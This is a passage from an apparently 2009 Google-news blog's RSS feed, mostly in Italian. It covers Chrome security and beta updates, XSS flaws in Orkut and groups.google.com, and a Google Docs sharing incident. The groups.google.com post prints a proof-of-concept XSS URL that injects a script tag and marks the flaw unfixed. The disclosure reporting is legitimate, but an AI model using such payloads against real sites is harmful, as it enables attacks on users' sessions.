<p><span class="mid"><a class="highlO" href="http://www.tweakness.net/news/5050">Google Chrome &#8220;Dev&#8221; 2.0.174.0 </a></span> &#8211; <span class="mid"><a class="highlO" href="http://www.tweakness.net/news/5048"> Google Chrome Beta 2.0.172.5 </a></span> &#8211; <span class="mid"><a class="highlO" href="http://www.tweakness.net/news/keys=chrome&amp;wherenews=HEADER"> Altre </a></span></p>
<p>La falla affligge Google Chrome 1.0.154.55 e precedenti. Google classifica il problema di gravità &#8220;Alta&#8221;, in quanto permette, in certe condizioni, <strong>universal cross-site scripting (UXSS)</strong> senza interazione da parte dell&#8217;utente.</p>
<p><span class="Hv">Google Chrome 2.0.172.8 &#8220;Beta&#8221;  corregge invece due problematiche principali nel browser:</span> [<a href="http://code.google.com/p/chromium/issues/detail?id=9904" target="_blank">Issue 9904</a>] Su alcuni siti il testo scompare o non viene mai renderizzato. Per esempio, su Google Calendar i tioli di tutti gli eventi giornalieri non vengono mostrati; [<a href="http://code.google.com/p/chromium/issues/detail?id=10656" target="_blank">Issue 10656</a>] Google Chrome Beta non viene eseguito dopo l&#8217;aggiornamento alla versione 172.6. Questo ha interessato coloro che hanno installato Google Chrome tramite Google Pack, si sono iscritti al canale Beta, e non agiscono come amministratori del sistema. L&#8217;aggiornamento Beta <a href="http://dev.chromium.org/getting-involved/dev-channel/release-notes/releasenotes201728" target="_blank">non include ulteriori modifiche</a>.</p>
<p><span class="Hv">Google ha inoltre da poche ore reso disponibile la nuova versione 2.0.176.0 di Google Chrome sul canale &#8220;Developer&#8221;. Parleremo di questa release una <a href="http://www.tweakness.net/news/keys=chrome+dev&amp;wherenews=HEADER">news dedicata</a>.</span></p>
<p>Riportiamo la descrizione dei <a href="http://blog.chromium.org/2009/01/google-chrome-release-channels.html" target="_blank">tre canali di release di Google Chrome</a>: <strong>Stable channel.</strong> Tutti utilizzano il canale Stabile alla prima installazione di Google Chrome. Il canale Stabile viene aggiornato con funzionalità e correzioni una volta che queste vengono testate adeguatamente nel canale Beta. <strong>Beta channel.</strong> Dedicato a coloro che desiderano utilizzare e aiutare a sistemare le ultime funzionalità. Ogni mese circa, Google promuove funzionalità stabili e complete dal canale Dev al canale Beta. È un canale più stabile di quello Dev, ma manca ugualmente dell&#8217;ordine che ci si aspetta da un prodotto finito. <strong>Developer preview channel.</strong> Il canale Dev consente alle idee di essere testate (ed a volte scartate). Può rivelarsi molto instabile, e le nuove funzionalità spesso richiedono configurazioni manuali per essere abilitate. Consente tuttavia in modo semplice di aiutare gli sviluppatori nel miglioramento del prodotto.</p>
<p>Ricordiamo che tutti gli utenti possono scegliere il canale a cui registrarsi (Stable, Beta e Developer preview) sfruttando la versione aggiornata del software <a href="http://chromium.googlecode.com/files/chromechannel-2.0.exe" target="_blank">Chrome Channel Chooser</a>.</p>
<p>From: <a href="http://www.tweakness.net/news/5059" target="_blank">http://www.tweakness.net/news/5059</a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/12/nuova-patch-di-sicurezza-per-google-chrome/' rel='bookmark' title='Nuova patch di sicurezza per Google Chrome'>Nuova patch di sicurezza per Google Chrome</a></li>
<li><a href='http://www.googlebig.com/2008/09/11/google-chrome-dev-build-021531/' rel='bookmark' title='Google Chrome Dev Build 0.2.153.1'>Google Chrome Dev Build 0.2.153.1</a></li>
<li><a href='http://www.googlebig.com/2009/06/01/google-chrome-arriva-la-30/' rel='bookmark' title='Google Chrome, arriva la 3.0'>Google Chrome, arriva la 3.0</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/04/29/google-chrome-1015459-fix-sicurezza/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New critical XSS bug in Google&#8217;s Orkut</title>
		<link>http://www.googlebig.com/2009/04/25/new-critical-xss-bug-in-googles-orkut/</link>
		<comments>http://www.googlebig.com/2009/04/25/new-critical-xss-bug-in-googles-orkut/#comments</comments>
		<pubDate>Sat, 25 Apr 2009 16:59:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1377</guid>
		<description><![CDATA[Pierre Gardenat has discovered a vulnerability in Google&#8217;s service Orkut, which could be exploited by malicious people to conduct XSS attacks. Security researcher Pierre Gardenat reported a new interesting vulnerability [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/21/new-critical-xss-bug-in-google-code-search/' rel='bookmark' title='New critical XSS bug in Google Code Search'>New critical XSS bug in Google Code Search</a></li>
<li><a href='http://www.googlebig.com/2009/06/29/new-critical-xss-bug-in-googlelabs/' rel='bookmark' title='New critical XSS bug in GoogleLabs'>New critical XSS bug in GoogleLabs</a></li>
<li><a href='http://www.googlebig.com/2008/11/13/google-accounts-ssl-login-page-suffers-from-highly-critical-xss/' rel='bookmark' title='Google accounts SSL login page suffers from highly critical XSS'>Google accounts SSL login page suffers from highly critical XSS</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p><a href="http://www.xssed.com/archive/author=pgardenat">Pierre Gardenat</a> has discovered a vulnerability in Google&#8217;s service <a href="http://www.orkut.com/">Orkut</a>, which could be exploited by malicious people to conduct XSS attacks.<span id="more-1377"></span></p>
<p>Security researcher <a href="http://www.xssed.com/archive/author=pgardenat">Pierre Gardenat</a> reported a new interesting vulnerability in Google&#8217;s service <a href="http://www.orkut.com/">Orkut</a>. Malicious users can spread XSS worms on Orkut or steal authentication credentials from Google users who also use Orkut.</p>
<p>According to Pierre, it is important to note that thanks to the fact that this flaw affects an externally integrated application in Orkut, sensitive cookies cannot be read. An attacker will still have increased possibilities for a successful attack, just because he can force the connected user to go where he wants, using the existing open session(s).</p>
<p>Google also uses HTTPOnly option. Once again, this prevents an attacker from getting sensitive information, but still allows to launch powerful attacks. HTTPOnly &#8211; implemented from Firefox 3.0.6 and partially from Internet Explorer 7 : cf. <a href="http://www.owasp.org/index.php/HTTPOnly">http://www.owasp.org/index.php/HTTPOnly</a> &#8211; only helps mitigate session stealing.</p>
<p>Anyway, this particular flaw does not affect Google directly, but a trusted application. Above all, this vulnerability clearly shows how risky it can be for a large social network like Orkut when relying on external applications.</p>
<p>You can see a compromised Orkut profile on:</p>
<p style="text-align: justify;"><a href="http://www.orkut.com/Main#Application.aspx?uid=2377494914036893288&amp;appId=675426251494">http://www.orkut.com/Main#Application.aspx?uid=2377494914036893288&amp;appId=675426251494</a></p>
<p style="text-align: justify;"><span style="color: #ff0000;">(you need to be connected to orkut to be able to see this profile).</span></p>
<p style="text-align: justify;"><span style="text-decoration: underline;"><strong>Screenshot:</strong></span></p>
<p style="text-align: center;"><img src="http://www.xssed.com/files/image/News/Orkut_vulnerable.jpg" alt="" width="502" height="267" /></p>
<p style="text-align: justify;">Thanks Pierre for the report! :-) We hope that Orkut&#8217;s staff will look into this and fix it quickly&#8230;</p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/06/21/new-critical-xss-bug-in-google-code-search/' rel='bookmark' title='New critical XSS bug in Google Code Search'>New critical XSS bug in Google Code Search</a></li>
<li><a href='http://www.googlebig.com/2009/06/29/new-critical-xss-bug-in-googlelabs/' rel='bookmark' title='New critical XSS bug in GoogleLabs'>New critical XSS bug in GoogleLabs</a></li>
<li><a href='http://www.googlebig.com/2008/11/13/google-accounts-ssl-login-page-suffers-from-highly-critical-xss/' rel='bookmark' title='Google accounts SSL login page suffers from highly critical XSS'>Google accounts SSL login page suffers from highly critical XSS</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/04/25/new-critical-xss-bug-in-googles-orkut/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A vulnerability on groups.google.com has been founded</title>
		<link>http://www.googlebig.com/2009/04/16/a-vulnerability-on-groupsgooglecom-has-been-founded/</link>
		<comments>http://www.googlebig.com/2009/04/16/a-vulnerability-on-groupsgooglecom-has-been-founded/#comments</comments>
		<pubDate>Thu, 16 Apr 2009 07:34:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1348</guid>
		<description><![CDATA[HacKSever has discovered a vulnerability in groups.google.com, which could be exploited by malicious people to conduct XSS attacks. URL: http://groups.google.com/groups/dir?sel=usenet%3D%3C/noscript%3E%3Cscript%3Ealert(%27HacKSever%27)%3C/script%3E Author: HacKSever Status: UNFIXED Mirror: http://www.xssed.com/mirror/59598/<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/05/06/three-new-xss-of-google-knol-books-and-google/' rel='bookmark' title='Three new XSS of Google: Knol, Books and Google!'>Three new XSS of Google: Knol, Books and Google!</a></li>
<li><a href='http://www.googlebig.com/2008/04/11/due-nuove-vulnerabilita-per-google/' rel='bookmark' title='Due nuove vulnerabilita&#8217; per Google'>Due nuove vulnerabilita&#8217; per Google</a></li>
<li><a href='http://www.googlebig.com/2008/07/11/xss-new-xss-vulnerability-of-suggestqueriesgooglecom/' rel='bookmark' title='[XSS] New XSS Vulnerability of suggestqueries.google.com'>[XSS] New XSS Vulnerability of suggestqueries.google.com</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p><a href="http://www.xssed.com/archive/author=HacKSever/">HacKSever</a> has discovered a vulnerability in <a href="http://groups.google.com" target="_blank">groups.google.com</a>, which could be exploited by malicious people to conduct XSS attacks.<span id="more-1348"></span></p>
<p><strong>URL:</strong> http://groups.google.com/groups/dir?sel=usenet%3D%3C/noscript%3E%3Cscript%3Ealert(%27HacKSever%27)%3C/script%3E</p>
<p><strong>Author:</strong> <a href="http://www.xssed.com/archive/author=HacKSever/">HacKSever</a></p>
<p><strong>Status:</strong> UNFIXED</p>
<p><strong>Mirror:</strong> <a href="http://www.xssed.com/mirror/59598/" target="_blank">http://www.xssed.com/mirror/59598/</a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2009/05/06/three-new-xss-of-google-knol-books-and-google/' rel='bookmark' title='Three new XSS of Google: Knol, Books and Google!'>Three new XSS of Google: Knol, Books and Google!</a></li>
<li><a href='http://www.googlebig.com/2008/04/11/due-nuove-vulnerabilita-per-google/' rel='bookmark' title='Due nuove vulnerabilita&#8217; per Google'>Due nuove vulnerabilita&#8217; per Google</a></li>
<li><a href='http://www.googlebig.com/2008/07/11/xss-new-xss-vulnerability-of-suggestqueriesgooglecom/' rel='bookmark' title='[XSS] New XSS Vulnerability of suggestqueries.google.com'>[XSS] New XSS Vulnerability of suggestqueries.google.com</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/04/16/a-vulnerability-on-groupsgooglecom-has-been-founded/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google risolve una lacuna nel servizio Docs</title>
		<link>http://www.googlebig.com/2009/03/11/google-risolve-una-lacuna-nel-servizio-docs/</link>
		<comments>http://www.googlebig.com/2009/03/11/google-risolve-una-lacuna-nel-servizio-docs/#comments</comments>
		<pubDate>Wed, 11 Mar 2009 08:50:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Google Docs]]></category>
		<category><![CDATA[Google Vulns]]></category>

		<guid isPermaLink="false">http://www.googlebig.com/?p=1230</guid>
		<description><![CDATA[Alcuni utenti di Google Docs sarebbero stati afflitti da un problema di sicurezza: i loro documenti sarebbero stati &#8220;inavvertitamente&#8221; condivisi con altre persone. Jennifer Mazzon, product manager del servizio &#8220;Docs&#8221;, [...]<div class='yarpp-related-rss'>

Related posts:<ol>
<li><a href='http://www.googlebig.com/2008/01/11/google-docs-uploader-upload-dei-documenti-su-google-docs/' rel='bookmark' title='Google Docs Uploader &#8211; Upload dei documenti su Google Docs'>Google Docs Uploader &#8211; Upload dei documenti su Google Docs</a></li>
<li><a href='http://www.googlebig.com/2009/10/15/google-docs-condivide-le-cartelle/' rel='bookmark' title='Google Docs condivide le cartelle'>Google Docs condivide le cartelle</a></li>
<li><a href='http://www.googlebig.com/2008/07/11/google-docs-sparisce-per-unora/' rel='bookmark' title='Google Docs sparisce per un’ora'>Google Docs sparisce per un’ora</a></li>
</ol>
</div>
]]></description>
				<content:encoded><![CDATA[<p>Alcuni utenti di <strong>Google Docs</strong> sarebbero stati afflitti da un <strong>problema di sicurezza</strong>: i loro documenti sarebbero stati &#8220;inavvertitamente&#8221; condivisi con altre persone. <strong>Jennifer Mazzon</strong>, product manager del servizio &#8220;Docs&#8221;, ha spiegato che il problema si è limitato alle persone con le quali il proprietario di un documento od un collaboratore dotato di diritti di condivisione, avevano precedentemente &#8220;messo a fattor comune&#8221; un file.<span id="more-1230"></span></p>
<p>La <strong>Mazzon</strong> ha confermato come la problematica abbia interessato un <strong>numero molto ristretto numero di utenti</strong> (lo<strong> 0,05%</strong> dei documenti complessivamente gestiti attraverso Google Docs). L&#8217;incidente è stato tempestivamente <strong>risolto dai tecnici di Google</strong> impiegando una procedura automatizzata informando dell&#8217;accaduto gli utenti affetti dal problema.</p>
<p>Nel mese di gennaio scorso, Google ha dichiarato di aver siglato diversi accordi con alcuni rivenditori IT con l&#8217;obiettivo di commercializzare l&#8217;accesso ai servizi online della società fondata da Larry Page e Sergey Brin agli utenti di tipo aziendale. A partire dalla fine di questo mese, infatti, i vari reseller di Google potranno personalizzare e supportare direttamente le versioni &#8220;Premium&#8221;, a pagamento, di Google Apps.</p>
<p>From: <a href="http://www.ilsoftware.it/articoli.asp?ID=5071" target="_blank">http://www.ilsoftware.it/articoli.asp?ID=5071</a></p>
<div class='yarpp-related-rss'>
<p>Related posts:<ol>
<li><a href='http://www.googlebig.com/2008/01/11/google-docs-uploader-upload-dei-documenti-su-google-docs/' rel='bookmark' title='Google Docs Uploader &#8211; Upload dei documenti su Google Docs'>Google Docs Uploader &#8211; Upload dei documenti su Google Docs</a></li>
<li><a href='http://www.googlebig.com/2009/10/15/google-docs-condivide-le-cartelle/' rel='bookmark' title='Google Docs condivide le cartelle'>Google Docs condivide le cartelle</a></li>
<li><a href='http://www.googlebig.com/2008/07/11/google-docs-sparisce-per-unora/' rel='bookmark' title='Google Docs sparisce per un’ora'>Google Docs sparisce per un’ora</a></li>
</ol></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.googlebig.com/2009/03/11/google-risolve-una-lacuna-nel-servizio-docs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
